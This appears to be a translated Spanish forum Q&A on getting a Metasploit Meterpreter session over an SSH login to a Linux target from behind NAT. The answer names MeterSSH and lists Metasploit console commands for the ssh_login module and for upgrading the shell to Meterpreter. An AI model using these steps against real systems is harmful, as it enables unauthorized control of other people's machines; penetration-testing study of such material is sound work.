Meterpreter en conexión ssh


0

Estoy detrás de NAT.

Puedo iniciar sesión en ssh en el objetivo.

¿Cómo usar metasploit/ enviar a meterpretertravés de esa conexión SSH?

Lo intenté shell_to_meterpreterpero falló porque no puedo abrir mi puerto para que se conecte TCP inverso.

Ambas máquinas están en Linux.

Respuestas:


1

Ventanas:

Puedes intentar usar MeterSSH .

MeterSSH es una manera fácil de inyectar código shell nativo en la memoria y canalizar cualquier cosa sobre SSH a la máquina atacante a través de un túnel SSH y todo autocontenido en un solo archivo Python.

Linux:

Puede usar el módulo auxiliar de metasploit llamado ssh_login:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109  
msf auxiliary(ssh_login) > set username foo   
msf auxiliary(ssh_login) > set password bar
msf auxiliary(ssh_login) > exploit

Ahora convierta el comando shell en meterpreter shell mediante el siguiente comando

session –u 1

Olvidé agregar Ambas máquinas están en Linux.
vfjpl
Al usar nuestro sitio, usted reconoce que ha leído y comprende nuestra Política de Cookies y Política de Privacidad.
Licensed under cc by-sa 3.0 with attribution required.